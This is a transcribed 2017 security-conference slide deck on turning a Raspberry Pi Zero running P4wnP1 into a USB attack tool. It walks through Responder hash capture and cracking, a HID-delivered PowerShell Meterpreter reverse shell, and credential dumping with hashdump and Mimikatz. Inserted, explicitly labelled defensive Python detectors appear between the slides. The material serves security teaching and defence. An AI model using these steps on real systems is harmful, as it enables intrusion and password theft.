weaponizing the raspberry pi zero - black hat sessions 2017 · the almighty raspberry pi zero w •...

Weaponizing the Raspberry Pi Zero Black Hat Sessions XV

Upload: lydien

Post on 17-Apr-2018



Weaponizing the Raspberry Pi Zero

Black Hat Sessions XV


Welcome!

28/06/2017 2

Niels Vonk, Security Consultant

Vestdijk 59, 5611 CA Eindhoven

E-mail: [email protected]

06 – 5751 6677

Ben Brücker, Security Consultant

Vestdijk 59, 5611 CA Eindhoven

E-mail: [email protected]

06 – 2694 9189


Agenda

• Latest attack platforms

• The Raspberry Pi Zero

• Various attack methods

• Demo 1 – Responder

• Demo 2 – Meterpreter


Hardware attack platforms


Attack vectors


HID attacks

• Attack started to get popular around 2010

• Main development by Adrian Crenshaw (IronGeek), Darren Kitchen (Hak5) and Dave Kennedy (TrustedSec)

• Allows attackers to interface with systems as a keyboard

• Plug-and-Play for known OS


Network interface attacks

• An attached USB device acts as a network interface

• Installation without user interaction

• Hijacks priority via metrics

• Ability to launch network based attacks


The almighty Raspberry Pi Zero W

• 1GHz, single-core CPU

• 512MB RAM

• Mini HDMI and USB On-The-Go ports

• Micro USB power

• 802.11 b/g/n wireless LAN

• Bluetooth 4.1

• Bluetooth Low Energy (BLE)


P4wnP1

• Developed by Marcus Mengs (MaMe82)
  • https://github.com/mame82/P4wnP1

• Transforms a cheap Pi into a complete attack platform

• Support for:
  • HID attacks
  • Network attacks
  • Data transfers
  • Cross interaction between Pi and target


P4wnP1 – Network attack

• For Windows targets it will act as an RNDIS interface

• For Linux/Mac targets it will act as a CDC ECM interface

• Creates priority via metrics of the interfaces
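A host-side check for the metric takeover described on this slide, as an added example that is not part of the slides or of P4wnP1. It assumes a Linux host, where RNDIS and CDC ECM adapters bind to the `rndis_host` and `cdc_ether` drivers; the route table, interface names and driver map are constructed sample data.

```python
# Added example: spot a USB network adapter that has won the default route.
import re

# Linux host-side drivers that bind RNDIS and CDC ECM devices.
USB_NET_DRIVERS = {"rndis_host", "cdc_ether"}

def default_routes(route_text):
    """Parse `ip -4 route show` style lines into sorted (metric, device) pairs."""
    routes = []
    for line in route_text.splitlines():
        if not line.startswith("default "):
            continue
        dev = re.search(r"\bdev (\S+)", line)
        metric = re.search(r"\bmetric (\d+)", line)
        if dev:
            # A route printed without a metric has metric 0, the most preferred.
            routes.append((int(metric.group(1)) if metric else 0, dev.group(1)))
    return sorted(routes)

def usb_route_takeover(route_text, driver_of):
    """Return (usb_dev, displaced_dev) if a USB NIC outranks another uplink.

    driver_of maps interface name -> kernel driver name, as found by resolving
    /sys/class/net/<if>/device/driver on a live system.
    """
    routes = default_routes(route_text)
    if len(routes) < 2:
        return None
    winner, runner_up = routes[0][1], routes[1][1]
    if (driver_of.get(winner) in USB_NET_DRIVERS
            and driver_of.get(runner_up) not in USB_NET_DRIVERS):
        return (winner, runner_up)
    return None

# Constructed sample: a wired uplink plus a freshly attached USB adapter.
SAMPLE_ROUTES = """\
default via 10.0.0.1 dev eth0 proto dhcp metric 100
default via 172.16.0.1 dev usb0 proto dhcp metric 20
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.57 metric 100
172.16.0.0/30 dev usb0 proto kernel scope link src 172.16.0.2 metric 20
"""
SAMPLE_DRIVERS = {"eth0": "e1000e", "usb0": "rndis_host"}

if __name__ == "__main__":
    print(usb_route_takeover(SAMPLE_ROUTES, SAMPLE_DRIVERS))
```

A phone used for USB tethering binds the same drivers, so a hit is a prompt to check what was plugged in rather than proof of an attack.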


P4wnP1 - HID attack

• Plug-and-play installation posing as keyboard

• Ability to change the PID and VID for whitelist bypassing

• Can write exploits/backdoors on the target via the keyboard

• Allows in-memory execution via PowerShell
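Because the PID and VID can be changed, an allow-list keyed on them does not identify the hardware; the interfaces a device exposes say more. The check below is an added example, not code from the slides or from P4wnP1: it classifies a device by its interface class triples and flags a keyboard that also brings a network function. The device records, the placeholder IDs and the `expected_by_id` inventory are constructed assumptions.

```python
# Added example: judge a USB device by the interfaces it exposes, not by VID/PID.
# Triples are (bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol).
RNDIS_TRIPLES = {(0x02, 0x02, 0xFF), (0xE0, 0x01, 0x03), (0xEF, 0x04, 0x01)}

def function_of(triple):
    """Map one interface descriptor triple to a coarse function name."""
    cls, sub, proto = triple
    if cls == 0x03:
        return "hid-keyboard" if proto == 0x01 else "hid"
    if triple in RNDIS_TRIPLES:
        return "net-rndis"
    if cls == 0x02 and sub == 0x06:
        return "net-cdc-ecm"
    if cls == 0x0A:
        return "cdc-data"  # data half of a CDC or RNDIS function
    return "other"

def assess(device, expected_by_id):
    """Return a list of findings for one device record.

    expected_by_id is a hypothetical defender-kept inventory mapping an
    allow-listed (vid, pid) to the functions that model really exposes.
    """
    funcs = {function_of(t) for t in device["interfaces"]} - {"cdc-data"}
    has_net = any(f.startswith("net-") for f in funcs)
    findings = []
    if has_net:
        findings.append("usb-network-interface")
    if has_net and any(f.startswith("hid") for f in funcs):
        findings.append("hid-plus-network-composite")
    expected = expected_by_id.get((device["vid"], device["pid"]))
    if expected is None:
        findings.append("id-not-allow-listed")
    elif not funcs <= expected:
        findings.append("allow-listed-id-unexpected-functions")
    return findings

# Constructed sample data; the IDs are placeholders, not real products.
EXPECTED = {(0x1234, 0x0001): {"hid-keyboard"}}
PLAIN_KEYBOARD = {"vid": 0x1234, "pid": 0x0001, "interfaces": [(0x03, 0x01, 0x01)]}
SPOOFED_ID = {"vid": 0x1234, "pid": 0x0001, "interfaces": [
    (0x03, 0x01, 0x01), (0xE0, 0x01, 0x03), (0x0A, 0x00, 0x00)]}
ECM_ONLY = {"vid": 0x1234, "pid": 0x0002, "interfaces": [
    (0x02, 0x06, 0x00), (0x0A, 0x00, 0x00)]}

if __name__ == "__main__":
    for dev in (PLAIN_KEYBOARD, SPOOFED_ID, ECM_ONLY):
        print(hex(dev["vid"]), hex(dev["pid"]), assess(dev, EXPECTED))
```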


Demo non-tech guide

• Login to the Pi via Secure Shell Protocol (SSH)

• Edit the configuration file to select the correct payload

• Plug the Pi into the target via the USB port

• Wait and see the payload execute

• Retrieve the Pi

• Power on the Pi and login to the Pi via Secure Shell Protocol (SSH)

• Inspect your loot

• Crack the hash to retrieve the password


Responder attacks


Demo 1 - Responder

• P4wnP1 will install itself as a network device

• P4wnP1 will give an IP address to the target

• Routes will be set to redirect traffic to the P4wnP1

• Responder will start on the P4wnP1

• Client will try to connect to a non-existing share

• Responder will capture the authentication hash

• Win!


Demo 1 – Responder (prep)

• Use PuTTY to SSH into your Pi
  • IP address of your Pi = 192.168.1.1<number on your Pi>

• Edit the setup file using the command:
  • nano ~/P4wnP1/setup.cfg

• and make sure that the line with PAYLOAD=responder is not commented out (PAYLOAD=responder instead of #PAYLOAD=responder)

• Save the file via the following hotkey:
  • CTRL+X Y ENTER

• Inspect the payload using the command:
  • nano ~/P4wnP1/payloads/responder

• Attach the P4wnP1 via the USB port to the target


Demo 1 – Responder (action)

• Use PuTTY to SSH into your Pi
  • IP address of your Pi = 192.168.1.1<number on your Pi>

• Run the following command to see Responder:
  • sudo screen -x

• Inspect behaviour and verify the payload has executed

• Exit the screen session using:
  • CTRL+A D


Demo 1 – Responder (P4wn)

• Now we are going to crack the retrieved hash via the following command:
  • /home/pi/P4wnP1/crack_last_responder.sh

• This command will run John the Ripper against a wordlist to retrieve the password

• Win!


Demo non-tech guide

• Login to the Pi via Secure Shell Protocol (SSH)

• Edit the configuration file to select the correct payload

• Create malicious code

• Insert created code in the payload

• Plug the Pi into the target via the USB port

• Wait and see the payload execute

• Retrieve the Pi

• Interact with the target via a remote connection that is created via the malicious code


Meterpreter attack

• Generate malicious code on attack machine

• Deliver this code via various methods on the target

• This code will run on the target machine and connect back to the attacker thus bypassing ingress firewall filtering

• Via this tunnel we can interact and execute commands on the target machine


Demo 2 - Meterpreter

• P4wnP1 will install itself as a HID device

• Upon installation of the drivers the payload will be executed

• Script will start a shell with admin privileges

• The Meterpreter payload will be typed out as a base64-encoded string

• PowerShell will decode the base64 string and execute it in memory

• Creates a reverse_tcp shell to MSF listener

• Win!
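The chain on this slide leaves two host events close together: a keyboard device arriving, then PowerShell starting with a long base64 string on its command line. The correlation below is an added example written for defenders, not part of the slides; the event records, the 60-second window and the sample command line are constructed assumptions, and the embedded blob is a harmless `Write-Output` string.

```python
# Added example: correlate a new keyboard with an encoded PowerShell launch.
import base64
import re
from datetime import datetime, timedelta

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
WINDOW = timedelta(seconds=60)  # assumed correlation window, tune per site

def decoded_blob(cmdline):
    """Return the text of a long base64 run on a PowerShell command line, else None."""
    if "powershell" not in cmdline.lower():
        return None
    match = B64_RUN.search(cmdline)
    if match is None:
        return None
    try:
        raw = base64.b64decode(match.group(0))
    except ValueError:
        return "<undecodable>"  # still worth flagging
    # Assumption: -EncodedCommand style text, which is UTF-16LE.
    return raw.decode("utf-16-le", errors="replace")

def correlate(events):
    """Return (device, decoded_text) for encoded launches soon after a keyboard arrives."""
    hits, last_kbd = [], None
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["kind"] == "device_arrival" and ev["class"] == "Keyboard":
            last_kbd = ev
        elif ev["kind"] == "process_start" and last_kbd is not None:
            text = decoded_blob(ev["cmdline"])
            if text is not None and ev["time"] - last_kbd["time"] <= WINDOW:
                hits.append((last_kbd["device"], text))
    return hits

# Constructed events; on Windows the sources would be Security 6416 and 4688.
T0 = datetime(2017, 6, 28, 10, 0, 0)
BLOB = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
EVENTS = [
    {"time": T0, "kind": "device_arrival", "class": "Keyboard",
     "device": "USB\\VID_1234&PID_0001"},
    {"time": T0 + timedelta(seconds=8), "kind": "process_start",
     "cmdline": r"C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -enc " + BLOB},
    {"time": T0 + timedelta(hours=3), "kind": "process_start",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    print(correlate(EVENTS))
```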


Demo 2 - Meterpreter (prep)

• Use PuTTY to SSH into your Pi
  • IP address of your Pi = 192.168.1.1<number on your Pi>

• Edit the setup file via the command:
  • nano ~/P4wnP1/setup.cfg

• and make sure that the line with PAYLOAD=meterpreter is not commented out
  • (PAYLOAD=meterpreter instead of #PAYLOAD=meterpreter)

• Save the file via the following hotkey:
  • CTRL+X Y

• Inspect the payload via the command:
  • nano ~/P4wnP1/payloads/meterpreter


Demo 2 - Meterpreter (prep)

• Use PuTTY to SSH into the Metasploit server
  • IP address of the Metasploit server = 192.168.1.100

• Run the following command to generate a payload:
  • bash payload_generator.sh

• Copy the output starting at:
  • %COMSPEC% /b /c start /b /min powershell.exe

• Now we are going to replace the old payload in the meterpreter file on the Pi
  • nano ~/P4wnP1/payloads/meterpreter

• Search for the line starting with:
  • STRING %COMSPEC% /b /c start


Demo 2 - Meterpreter (prep)

• Remove this line via the following hotkey:
  • CTRL+K

• Paste the payload by clicking the right mouse button

• Save the file via the following hotkey:
  • CTRL+X Y


Demo 2 - Meterpreter (prep)

• Now back on the Metasploit server run the following command:
  • msfconsole -r msf_receiver.rc

• This will start the Meterpreter handler to receive incoming connections

• Attach the P4wnP1 via the USB port to the target


Demo 2 - Meterpreter (action)

• The script will create an elevated PowerShell session

• The payload will be typed out by the Pi

• Upon activation a new session should appear on the MSF server

• Access the session via the command:
  • sessions -i <id>


Demo 2 - Meterpreter (P4wn)

• Now that we have an interactive shell, let's see what we can do

• Run the command getuid to retrieve the current user

• Get SYSTEM privileges with getsystem

• We can now dump the password hashes with hashdump

• But wait! Why not dump them in plain text? ☺

• Run load kiwi to start the newest version of Mimikatz
  • Now execute the command creds_all


Questions?


Other usages

• Malware installation on air-gapped systems

• Extraction of files from target computer

• Pivot into internal networks

• Man-in-the-Middle attacks


Future plans

• Let the P4wnP1 connect to your mobile devices over WiFi/Bluetooth for real-time access and interaction

• Create new samples for the payload

• More advanced staged exploits that will create a permanent foothold in the network
